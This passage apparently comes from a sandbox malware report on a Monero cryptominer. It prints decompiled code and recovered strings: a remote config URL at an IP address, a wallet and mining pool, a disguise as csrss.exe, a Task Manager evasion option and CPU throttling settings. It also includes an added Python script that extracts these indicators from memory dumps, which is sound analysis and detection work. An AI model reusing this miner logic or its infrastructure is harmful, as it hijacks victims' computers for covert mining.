                                                                                                                                          												if(_t139 != 0) {
                                                                                                                                          													E035D39B0(_t153);
                                                                                                                                          													_push(_v16);
                                                                                                                                          													E035D3680(_t153, _v20);
                                                                                                                                          													_t189 = _t189 + 8;
                                                                                                                                          												}
                                                                                                                                          												_t140 = E035D4DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", 0x37a2128, 0, 0);
                                                                                                                                          												_t182 = _t189 + 0x14;
                                                                                                                                          												if(_t140 != 0) {
                                                                                                                                          													E035D39B0(_t153);
                                                                                                                                          													E035D3B50(_t153, _v20, _v16);
                                                                                                                                          													_t182 = _t182 + 8;
                                                                                                                                          												}
                                                                                                                                          												goto L33;
                                                                                                                                          											}
                                                                                                                                          											ExitProcess(0x3c);
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										ExitProcess(0x32);
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          								ExitProcess(0x31);
                                                                                                                                          							}
                                                                                                                                          							ExitProcess(0x30);
                                                                                                                                          						}
                                                                                                                                          						ExitProcess(0x30);
                                                                                                                                          					} else {
                                                                                                                                          						ExitProcess(0x30);
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				ExitProcess(0x3b);
                                                                                                                                          			}
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d48de
                                                                                                                                          0x035d48e4
                                                                                                                                          0x00000000
                                                                                                                                          0x035d48ee
                                                                                                                                          0x035d48ee
                                                                                                                                          0x035d48f4
                                                                                                                                          0x035d4916
                                                                                                                                          0x035d491d
                                                                                                                                          0x035d4928
                                                                                                                                          0x035d492d
                                                                                                                                          0x035d4930
                                                                                                                                          0x035d4932
                                                                                                                                          0x035d4932
                                                                                                                                          0x035d4937
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4937
                                                                                                                                          0x035d48fe
                                                                                                                                          0x035d4903
                                                                                                                                          0x035d4906
                                                                                                                                          0x035d490d
                                                                                                                                          0x035d490f
                                                                                                                                          0x00000000
                                                                                                                                          0x035d490f
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4940
                                                                                                                                          0x035d4944
                                                                                                                                          0x035d49ab
                                                                                                                                          0x035d49ab
                                                                                                                                          0x035d49b1
                                                                                                                                          0x035d49f9
                                                                                                                                          0x035d49f9
                                                                                                                                          0x035d49fd
                                                                                                                                          0x035d4a03
                                                                                                                                          0x035d4a0a
                                                                                                                                          0x035d4a10
                                                                                                                                          0x035d4a17
                                                                                                                                          0x035d4a28
                                                                                                                                          0x035d4a32
                                                                                                                                          0x035d4a37
                                                                                                                                          0x035d4a3c
                                                                                                                                          0x035d4a48
                                                                                                                                          0x035d4a4a
                                                                                                                                          0x035d4a57
                                                                                                                                          0x035d4a59
                                                                                                                                          0x035d4a72
                                                                                                                                          0x035d4a75
                                                                                                                                          0x035d4a7a
                                                                                                                                          0x035d4a7f
                                                                                                                                          0x035d4a88
                                                                                                                                          0x035d4a8c
                                                                                                                                          0x035d4a8f
                                                                                                                                          0x035d4a94
                                                                                                                                          0x035d4a94
                                                                                                                                          0x035d4aae
                                                                                                                                          0x035d4aca
                                                                                                                                          0x035d4acf
                                                                                                                                          0x035d4acf
                                                                                                                                          0x035d4ad8
                                                                                                                                          0x035d4add
                                                                                                                                          0x035d4add
                                                                                                                                          0x035d4a7f
                                                                                                                                          0x035d4a59
                                                                                                                                          0x035d4ae5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4ae5
                                                                                                                                          0x035d4a19
                                                                                                                                          0x035d4a1b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a1d
                                                                                                                                          0x035d4a1e
                                                                                                                                          0x035d4a23
                                                                                                                                          0x035d4a26
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a26
                                                                                                                                          0x035d4a0c
                                                                                                                                          0x035d4a0e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a0e
                                                                                                                                          0x035d49ff
                                                                                                                                          0x035d49ff
                                                                                                                                          0x035d4a01
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4a01
                                                                                                                                          0x035d49b7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49c0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49c9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49cd
                                                                                                                                          0x035d49d0
                                                                                                                                          0x035d49d5
                                                                                                                                          0x035d49d5
                                                                                                                                          0x035d49e1
                                                                                                                                          0x035d49e6
                                                                                                                                          0x035d49e9
                                                                                                                                          0x035d49f0
                                                                                                                                          0x035d49f2
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49f2
                                                                                                                                          0x035d4946
                                                                                                                                          0x035d4946
                                                                                                                                          0x035d494c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4956
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4963
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4970
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4978
                                                                                                                                          0x035d497b
                                                                                                                                          0x035d4980
                                                                                                                                          0x035d4983
                                                                                                                                          0x035d4983
                                                                                                                                          0x035d498c
                                                                                                                                          0x035d4997
                                                                                                                                          0x035d499c
                                                                                                                                          0x035d499f
                                                                                                                                          0x035d49a1
                                                                                                                                          0x035d49a1
                                                                                                                                          0x035d49a8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d49a8
                                                                                                                                          0x035d48d4
                                                                                                                                          0x035d4853
                                                                                                                                          0x035d47cd
                                                                                                                                          0x035d46b6
                                                                                                                                          0x035d46bc
                                                                                                                                          0x035d46c4
                                                                                                                                          0x035d46d4
                                                                                                                                          0x035d46d9
                                                                                                                                          0x035d46dc
                                                                                                                                          0x035d46e9
                                                                                                                                          0x035d46ee
                                                                                                                                          0x035d46f3
                                                                                                                                          0x035d47d5
                                                                                                                                          0x035d47d5
                                                                                                                                          0x035d4705
                                                                                                                                          0x035d4715
                                                                                                                                          0x035d4726
                                                                                                                                          0x035d4737
                                                                                                                                          0x035d473c
                                                                                                                                          0x035d474e
                                                                                                                                          0x035d4754
                                                                                                                                          0x035d4756
                                                                                                                                          0x035d4767
                                                                                                                                          0x035d476c
                                                                                                                                          0x035d476f
                                                                                                                                          0x035d4771
                                                                                                                                          0x035d4773
                                                                                                                                          0x035d4778
                                                                                                                                          0x035d477e
                                                                                                                                          0x035d4783
                                                                                                                                          0x035d4783
                                                                                                                                          0x035d4799
                                                                                                                                          0x035d479e
                                                                                                                                          0x035d47a3
                                                                                                                                          0x035d47a5
                                                                                                                                          0x035d47b0
                                                                                                                                          0x035d47b5
                                                                                                                                          0x035d47b5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d47a3
                                                                                                                                          0x035d475a
                                                                                                                                          0x035d475a
                                                                                                                                          0x035d4668
                                                                                                                                          0x035d466a
                                                                                                                                          0x035d466a
                                                                                                                                          0x035d465d
                                                                                                                                          0x035d4627
                                                                                                                                          0x035d4627
                                                                                                                                          0x035d4607
                                                                                                                                          0x035d4607
                                                                                                                                          0x035d45e9
                                                                                                                                          0x035d45c9
                                                                                                                                          0x035d45cb
                                                                                                                                          0x035d45cb
                                                                                                                                          0x035d45c7
                                                                                                                                          0x035d4586

APIs
• GetTickCount.KERNEL32 ref: 035D4487
• SetErrorMode.KERNEL32(00000002), ref: 035D44E5
• SetErrorMode.KERNEL32(00000000), ref: 035D44EB
• CreateMutexA.KERNEL32(00000000,00000000,037A206C), ref: 035D4506
• ExitProcess.KERNEL32 ref: 035D4512
• GetLastError.KERNEL32 ref: 035D451E
• ExitProcess.KERNEL32 ref: 035D4529
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Error$ExitModeProcess$CountCreateLastMutexTick
• String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$pool.supportxmr.com:3333$taskmgr.exe$viTRMUuKeV$viTRMUuKeV
• API String ID: 3615071802-2903677349
• Opcode ID: fde4af4600ce84402bad7013a6c97d4e7067f55479b91411fc77e2e761f43a01
• Instruction ID: 0f7acb865b928a2d4ad8197b38984dbee25a588df8e0cb32863ecd52f8484b33
• Opcode Fuzzy Hash: fde4af4600ce84402bad7013a6c97d4e7067f55479b91411fc77e2e761f43a01
• Instruction Fuzzy Hash: 78F16CF9E40705ABEB30FBADFC06F9E7278BB84741F480160E905E5162EB749644CB52
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 92%
	// Sandbox decompilation of the routine at 0x035d3220. The comments are analyst annotations
	// inferred from the call arguments and the recovered strings: E035Dxxxx are unresolved internal
	// helpers, and where the decompiler prints a string literal as an argument it stands for the
	// global buffer that held that string when the memory dump was taken.
	E035D3220(void* __ecx, void* __esi, void* __eflags) {
		intOrPtr _t10;
		intOrPtr _t14;
		void* _t17;
		intOrPtr _t19;
		intOrPtr _t27;
		void* _t31;
		void* _t35;
		long _t37;
		short _t38;
		void* _t41;
		void* _t43;
		struct HINSTANCE__* _t44;
		struct HINSTANCE__* _t46;
		struct HINSTANCE__* _t48;
		struct HINSTANCE__* _t50;
		struct HINSTANCE__* _t52;
		struct HINSTANCE__* _t54;
		intOrPtr _t56;
		struct HINSTANCE__* _t58;
		struct HINSTANCE__* _t60;
		void* _t67;
		void* _t70;
		void* _t73;

		_t67 = __esi;
		_t43 = __ecx;
		// Reset the global configuration block. The lengths stored here match the recovered
		// strings: 0x5f = 95 (the Monero wallet address), 0x18 = 24 ("pool.supportxmr.com:3333"),
		// 0x20 = 32 ("http://45.144.225.135/config.txt") and 5 ("FALSE").
		 *0x37a1300 = 0;
		 *0x37a1304 = 0;
		 *0x37a1308 = 0;
		 *0x37a130c = 0;
		 *0x37a1310 = 0x7530; // 30000
		 *0x37a1238 = 0x5f; // 95
		 *0x37a12bc = 0x18; // 24
		 *0x37a19ac = 0x20; // 32
		 *0x37a19b0 = 5;
		 *0x37a1318 = 0;
		 *0x37a131c = 0;
		 *0x37a1320 = 0;
		 *0x37a1bb8 = 1;
		 *0x37a1bbc = 0xa;
		 *0x37a1bc0 = 0;
		 *0x37a1c24 = 0;
		 *0x37a210c = 1;
		// E035D1BB0(dst, 0, n) is used like memset and E035D17E0(dst, src) like a string copy:
		// the e-mail field defaults to "[no-email]" and the GUID field to "GUID_ERROR".
		E035D1BB0(0x37a208c, 0, 0x80);
		E035D17E0(0x37a208c, "[no-email]");
		E035D17E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
		asm("xorps xmm0, xmm0");
		 *0x37a1c48 = 0;
		asm("movups [0x37a1c28], xmm0");
		asm("movups [0x37a1c38], xmm0");
		E035D1BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
		E035D1BB0("csrss.exe", 0, 0x60);
		asm("xorps xmm0, xmm0");
		asm("movups [0x37a158c], xmm0");
		asm("movups [0x37a159c], xmm0");
		E035D1BB0(0x37a19b4, 0, 0x200);
		E035D1BB0(0x37a12c0, 0, 0x40);
		E035D1640(0x37a12c0, 0x35d9df0, 0x40);
		// The configuration strings are not stored in clear. Each one is copied out of the image
		// (0x35d9xxx) with E035D1640 (memcpy-like) and then handed to E035D1CE0 together with the
		// 16-byte key "0125789244697858", i.e. decrypted in place at start-up. The decryption is
		// guarded by comparisons (E035D17B0, strcmp-like) against the "FALSE" buffer, which is
		// apparently how a disabled option is encoded.
		E035D1BB0("http://45.144.225.135/config.txt", 0, 0x200);
		_t10 =  *0x37a19ac; // 0x20
		E035D1640("http://45.144.225.135/config.txt", 0x35d9e30, _t10 + 1);
		E035D1BB0("FALSE", 0, 0x200);
		_t14 =  *0x37a19b0; // 0x5
		E035D1640("FALSE", "FALSE", _t14 + 1);
		_t17 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
		_t73 = _t70 + 0x90;
		if(_t17 != 0) {
			E035D1CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x37a19ac);
			_t41 = E035D17B0("FALSE", "FALSE");
			_t73 = _t73 + 0x18;
			if(_t41 != 0) {
				E035D1CE0("0125789244697858", 0x10, "FALSE",  *0x37a19b0);
				_t73 = _t73 + 0x10;
			}
		}
		// E035D8270 queries the current process (what it checks is not resolved here); E035D8DD0
		// runs only when that query returns non-zero.
		_t19 = E035D8270(_t43, GetCurrentProcess());
		 *0x37a1314 = _t19;
		if(_t19 != 0) {
			E035D8DD0();
			_t60 =  *0x37a1318; // 0x0
			// The decompiler lost the operands of these conditionals (here and below); each one
			// sets a flag to a constant when the preceding string comparison matched.
			_t61 =  ==  ? 1 : _t60;
			 *0x37a1318 =  ==  ? 1 : _t60;
		}
		_push(_t67);
		// Decrypted option strings are matched against fixed tokens and turned into settings:
		// 0x37a1300 from "TRUE", 0x37a1304 from "TASKMGR" (cf. taskmgr.exe among the recovered
		// strings), 0x37a1308 = 1/2/3 for "1THREAD"/"50%CPU"/"100%CPU", 0x37a130c from "100%CPU".
		E035D17B0("TRUE", "TRUE");
		_t44 =  *0x37a1300; // 0x1
		_t45 =  ==  ? 1 : _t44;
		 *0x37a1300 =  ==  ? 1 : _t44;
		E035D17B0("TASKMGR", "TASKMGR");
		_t46 =  *0x37a1304; // 0x1
		_t47 =  ==  ? 1 : _t46;
		 *0x37a1304 =  ==  ? 1 : _t46;
		E035D17B0("1THREAD", "50%CPU");
		_t48 =  *0x37a1308; // 0x2
		_t49 =  ==  ? 1 : _t48;
		 *0x37a1308 =  ==  ? 1 : _t48;
		E035D17B0("50%CPU", "50%CPU");
		_t50 =  *0x37a1308; // 0x2
		_t51 =  ==  ? 2 : _t50;
		 *0x37a1308 =  ==  ? 2 : _t50;
		E035D17B0("100%CPU", "50%CPU");
		_t52 =  *0x37a1308; // 0x2
		_t53 =  ==  ? 3 : _t52;
		 *0x37a1308 =  ==  ? 3 : _t52;
		E035D17B0("100%CPU", "100%CPU");
		_t54 =  *0x37a130c; // 0x1
		_t55 =  ==  ? 1 : _t54;
		 *0x37a1bb4 = 0x1e; // 30
		 *0x37a130c =  ==  ? 1 : _t54;
		// Anti-tamper check: the wallet and pool strings are decrypted, run through E035D1BE0
		// (a 32-bit hash/checksum over buffer and length) and the results compared with the
		// constants 0xd82f1fb8 and 0x789308d0. A mismatch exits with code 0x27, so editing the
		// wallet or pool inside the binary without recomputing both constants makes the miner quit
		// at start-up.
		E035D1BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0, 0x100);
		_t27 =  *0x37a1238; // 0x5f
		E035D1640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x35d9f40, _t27 + 1);
		E035D1CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x37a1238);
		_t31 = E035D1BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x37a1238);
		E035D1BB0("pool.supportxmr.com:3333", 0, 0x80);
		_t56 =  *0x37a12bc; // 0x18
		E035D1640("pool.supportxmr.com:3333", 0x35da018, _t56 + 1);
		E035D1CE0("0125789244697858", 0x10, "pool.supportxmr.com:3333",  *0x37a12bc);
		_t35 = E035D1BE0("pool.supportxmr.com:3333",  *0x37a12bc);
		if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
			ExitProcess(0x27);
		}
		// E035D18D0 is used like strstr: a pool endpoint containing "nicehash.com" sets the flag
		// at 0x37a131c (XMRig has a dedicated NiceHash mode).
		E035D18D0("pool.supportxmr.com:3333", "nicehash.com");
		_t58 =  *0x37a131c; // 0x0
		_t59 =  !=  ? 1 : _t58;
		 *0x37a131c =  !=  ? 1 : _t58;
		// Self-check: GetModuleFileNameW returns 0 on failure and the buffer size (0x200 here) when
		// the path was truncated. Otherwise E035D8B20 presumably hashes the running image and
		// compares it with the embedded MD5 9dbcf183762872d8917b8a19535a0c65, which is the MD5 of
		// this sample (see the report header). Either outcome only decides which global is cleared.
		_t37 = GetModuleFileNameW(0, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200);
		if(_t37 == 0 || _t37 == 0x200) {
			_t38 = 0;
			 *0x37a1c4c = 0;
			goto L12;
		} else {
			_t38 = E035D8B20("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "9dbcf183762872d8917b8a19535a0c65");
			if(_t38 == 0) {
				L12:
				 *0x37a1c28 = 0;
				 *0x37a2110 = 0;
				return _t38;
			} else {
				 *0x37a1c48 = 0;
				 *0x37a2110 = 0;
				return _t38;
			}
		}
	}
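The routine above keeps its wallet address, pool endpoint and config URL encrypted in the image and only decrypts them at start-up, so the cleartext is recoverable from a process memory dump (which is how this report obtained the strings) rather than from the file on disk. The following Python is an added example, not part of the Joe Sandbox report or of the sample, showing how to pull that class of artefact out of a raw dump by pattern: Monero addresses by Base58 shape and length, host:port pool endpoints, URLs and the throttling tokens the parser above compares against. The sample bytes are constructed from the strings listed on this page; addresses are format-checked only, their checksum is not verified.

```python
import re
from dataclasses import dataclass, field

# Monero Base58 alphabet: 1-9, A-Z and a-z without 0, O, I and l.
_B58 = r"[1-9A-HJ-NP-Za-km-z]"

# Standard Monero addresses are 95 Base58 characters starting with '4' (0x5f, exactly the
# length the routine above stores for its wallet string); integrated addresses carry 11 more.
# Format check only: the address checksum is not verified here.
MONERO_ADDR_RE = re.compile(rf"(?<!{_B58})4{_B58}{{94}}(?:{_B58}{{11}})?(?!{_B58})")

# host:port or IPv4:port endpoints, the form stratum pools are configured in.
ENDPOINT_RE = re.compile(
    r"(?<![\w.-])((?:(?:[a-z0-9-]+\.)+[a-z]{2,})|(?:\d{1,3}\.){3}\d{1,3}):(\d{2,5})(?!\d)",
    re.IGNORECASE,
)

# URLs; NUL is excluded so a match stops at the end of a C string in the dump.
URL_RE = re.compile(r"https?://[^\s\x00\"'<>]+", re.IGNORECASE)

# The throttling tokens the parser above compares its option strings against.
THROTTLE_RE = re.compile(r"(?<!\w)(1THREAD|50%CPU|100%CPU)(?!\w)")


@dataclass
class MinerIocs:
    wallets: list = field(default_factory=list)
    pools: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    throttle: list = field(default_factory=list)


def _views(blob: bytes) -> list:
    """Narrow (latin-1) view plus UTF-16LE views at both byte alignments, because
    Win32 W-API buffers such as the GetModuleFileNameW path above are wide strings."""
    return [
        blob.decode("latin-1"),
        blob.decode("utf-16le", errors="ignore"),
        blob[1:].decode("utf-16le", errors="ignore"),
    ]


def _dedupe(items):
    """Drop duplicates while keeping first-seen order."""
    seen = set()
    return [x for x in items if not (x in seen or seen.add(x))]


def extract_miner_iocs(blob: bytes) -> MinerIocs:
    """Scan a raw dump for miner configuration artefacts and return them grouped."""
    wallets, pools, urls, throttle = [], [], [], []
    for text in _views(blob):
        wallets += MONERO_ADDR_RE.findall(text)
        pools += [f"{host}:{port}" for host, port in ENDPOINT_RE.findall(text)]
        urls += URL_RE.findall(text)
        throttle += THROTTLE_RE.findall(text)
    return MinerIocs(_dedupe(wallets), _dedupe(pools), _dedupe(urls), _dedupe(throttle))


# Constructed sample input: the strings this report recovered, laid out NUL-separated as
# they sit in a dump. The config URL is stored as UTF-16LE to exercise the wide view.
SAMPLE_DUMP = (
    b"--show-window\x003.1.0\x00"
    b"48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW\x00"
    b"C:\\ProgramData\\LKBNMTFJgl\x00csrss.exe\x00taskmgr.exe\x0050%CPU\x00"
    b"pool.supportxmr.com:3333\x00"
    + "http://45.144.225.135/config.txt".encode("utf-16le") + b"\x00\x00"
)

if __name__ == "__main__":
    found = extract_miner_iocs(SAMPLE_DUMP)
    for name in ("wallets", "pools", "urls", "throttle"):
        for value in getattr(found, name):
            print(f"{name}: {value}")
```

Against a real dump, read the file as bytes and pass it to extract_miner_iocs. Scanning three decodings of the same buffer is what makes the wide-string case work: the UTF-16LE URL is invisible in the latin-1 view because every other byte is NUL, and a string that starts at an odd offset is only aligned in the third view.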

Instruction addresses of the statements in the listing above, in order (the report prints one per line beside the code): 0x035d3220, 0x035d3220, 0x035d322c, 0x035d3236, 0x035d3240, 0x035d324a, 0x035d3254, 0x035d325e, 0x035d3268, 0x035d3272, 0x035d327c, 0x035d3286, 0x035d3290, 0x035d329a, 0x035d32a4, 0x035d32ae, 0x035d32b8, 0x035d32c2, 0x035d32cc, 0x035d32d6, 0x035d32e5, 0x035d32f4, 0x035d32fe, 0x035d3301, 0x035d3312, 0x035d3319, 0x035d3320, 0x035d332e, 0x035d3338, 0x035d3342, 0x035d3349, 0x035d3350, 0x035d3361, 0x035d3372, 0x035d3383, 0x035d3388, 0x035d3399
                                                                                                                                          0x035d33aa
                                                                                                                                          0x035d33af
                                                                                                                                          0x035d33c0
                                                                                                                                          0x035d33d2
                                                                                                                                          0x035d33d7
                                                                                                                                          0x035d33dc
                                                                                                                                          0x035d33f0
                                                                                                                                          0x035d33ff
                                                                                                                                          0x035d3404
                                                                                                                                          0x035d3409
                                                                                                                                          0x035d341d
                                                                                                                                          0x035d3422
                                                                                                                                          0x035d3422
                                                                                                                                          0x035d3409
                                                                                                                                          0x035d342d
                                                                                                                                          0x035d3435
                                                                                                                                          0x035d3441
                                                                                                                                          0x035d3443
                                                                                                                                          0x035d3448
                                                                                                                                          0x035d3450
                                                                                                                                          0x035d3453
                                                                                                                                          0x035d3453
                                                                                                                                          0x035d3459
                                                                                                                                          0x035d3464
                                                                                                                                          0x035d3469
                                                                                                                                          0x035d3476
                                                                                                                                          0x035d347e
                                                                                                                                          0x035d3484
                                                                                                                                          0x035d3489
                                                                                                                                          0x035d3496
                                                                                                                                          0x035d349e
                                                                                                                                          0x035d34a4
                                                                                                                                          0x035d34a9
                                                                                                                                          0x035d34b6
                                                                                                                                          0x035d34be
                                                                                                                                          0x035d34c4
                                                                                                                                          0x035d34c9
                                                                                                                                          0x035d34d6
                                                                                                                                          0x035d34e3
                                                                                                                                          0x035d34e9
                                                                                                                                          0x035d34ee
                                                                                                                                          0x035d34fb
                                                                                                                                          0x035d3508
                                                                                                                                          0x035d350e
                                                                                                                                          0x035d3513
                                                                                                                                          0x035d3520
                                                                                                                                          0x035d3523
                                                                                                                                          0x035d3534
                                                                                                                                          0x035d353a
                                                                                                                                          0x035d353f
                                                                                                                                          0x035d3550
                                                                                                                                          0x035d356a
                                                                                                                                          0x035d357a
                                                                                                                                          0x035d358d
                                                                                                                                          0x035d3592
                                                                                                                                          0x035d35a4
                                                                                                                                          0x035d35bb
                                                                                                                                          0x035d35ce
                                                                                                                                          0x035d35dd
                                                                                                                                          0x035d3673
                                                                                                                                          0x035d3673
                                                                                                                                          0x035d35f8
                                                                                                                                          0x035d35fd
                                                                                                                                          0x035d3608
                                                                                                                                          0x035d3617
                                                                                                                                          0x035d361d
                                                                                                                                          0x035d3626
                                                                                                                                          0x035d3657
                                                                                                                                          0x035d3659
                                                                                                                                          0x00000000
                                                                                                                                          0x035d362f
                                                                                                                                          0x035d3639
                                                                                                                                          0x035d3643
                                                                                                                                          0x035d365f
                                                                                                                                          0x035d365f
                                                                                                                                          0x035d3666
                                                                                                                                          0x035d3670
                                                                                                                                          0x035d3645
                                                                                                                                          0x035d3645
                                                                                                                                          0x035d364c
                                                                                                                                          0x035d3656
                                                                                                                                          0x035d3656
                                                                                                                                          0x035d3643

APIs
• GetCurrentProcess.KERNEL32(74B04D40), ref: 035D3426
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 035D361D
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: CurrentFileModuleNameProcess
• String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$50%CPU$50%CPU$50%CPU$50%CPU$9dbcf183762872d8917b8a19535a0c65$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$http://45.144.225.135/config.txt$nicehash.com$pool.supportxmr.com:3333$viTRMUuKeV
• API String ID: 2251294070-2292375719
• Opcode ID: f40fce067aaafb12dbee8c88ad6606012ec70c9c9de7a582816dee6f6323b5e3
• Instruction ID: fbc31ea5a7af366ec17aeb5a36bffb653d03ed0415ba1f31da1ef2030f5d902b
• Opcode Fuzzy Hash: f40fce067aaafb12dbee8c88ad6606012ec70c9c9de7a582816dee6f6323b5e3
• Instruction Fuzzy Hash: 0F91BFB8780B016EF764FFA8BD46F1936A0B7C4B81F848208A511696A7DBF99140CB85
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E035D4B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				void _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				void* _v20;
                                                                                                                                          				long _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				long _v32;
                                                                                                                                          				char* _v36;
                                                                                                                                          				char* _v40;
                                                                                                                                          				char* _v44;
                                                                                                                                          				char* _v48;
                                                                                                                                          				char* _v52;
                                                                                                                                          				intOrPtr _v56;
                                                                                                                                          				intOrPtr _v64;
                                                                                                                                          				char* _v68;
                                                                                                                                          				short _v88;
                                                                                                                                          				intOrPtr _v92;
                                                                                                                                          				intOrPtr _v96;
                                                                                                                                          				intOrPtr _v104;
                                                                                                                                          				char _v108;
                                                                                                                                          				void* _v112;
                                                                                                                                          				long _t54;
                                                                                                                                          				int _t55;
                                                                                                                                          				void* _t61;
                                                                                                                                          				void* _t62;
                                                                                                                                          				void* _t71;
                                                                                                                                          				long _t87;
                                                                                                                                          				char* _t91;
                                                                                                                                          				long _t108;
                                                                                                                                          				void* _t111;
                                                                                                                                          				char* _t118;
                                                                                                                                          				long _t119;
                                                                                                                                          				char* _t123;
                                                                                                                                          				void* _t126;
                                                                                                                                          				void* _t128;
                                                                                                                                          				void* _t134;
                                                                                                                                          				void* _t136;
                                                                                                                                          				void* _t137;
                                                                                                                                          				void* _t138;
                                                                                                                                          				void* _t139;
                                                                                                                                          				void* _t140;
                                                                                                                                          
                                                                                                                                          				E035D1BB0( &_v108, 0, 0x38);
                                                                                                                                          				_t118 = _a4;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_t108 = 0;
                                                                                                                                          				_v112 = 0x3c;
                                                                                                                                          				_v92 = 0xffffffff;
                                                                                                                                          				_v104 = 0xffffffff;
                                                                                                                                          				_v64 = 0xffffffff;
                                                                                                                                          				_v56 = 0xffffffff;
                                                                                                                                          				_t54 = E035D1850(_t118);
                                                                                                                                          				_t136 = _t134 + 0x10;
                                                                                                                                          				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112);
                                                                                                                                          				if(_t55 != 0) {
                                                                                                                                          					_t123 = E035D15E0(_v92 + 1);
                                                                                                                                          					E035D1BB0(_t123, 0, _v92 + 1);
                                                                                                                                          					E035D1640(_t123, _v96, _v92);
                                                                                                                                          					_t137 = _t136 + 0x1c;
                                                                                                                                          					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
                                                                                                                                          					_v8 = _t61;
                                                                                                                                          					if(_t61 != 0) {
                                                                                                                                          						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0);
                                                                                                                                          						_v20 = _t62;
                                                                                                                                          						_push(_t123);
                                                                                                                                          						if(_t62 != 0) {
                                                                                                                                          							E035D1510();
                                                                                                                                          							E035D18D0(_t118, "https://");
                                                                                                                                          							_t138 = _t137 + 0xc;
                                                                                                                                          							_v52 = "text/*";
                                                                                                                                          							_v48 = "application/exe";
                                                                                                                                          							_v44 = "application/zlib";
				/* Decompiler output (Joe Sandbox). The flag selection below differs only by
				   INTERNET_FLAG_SECURE (0x00800000); the condition itself was not recovered. */
				_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
				_v40 = "application/gzip";
				_v36 = "application/applefile";
				_v32 = 0;
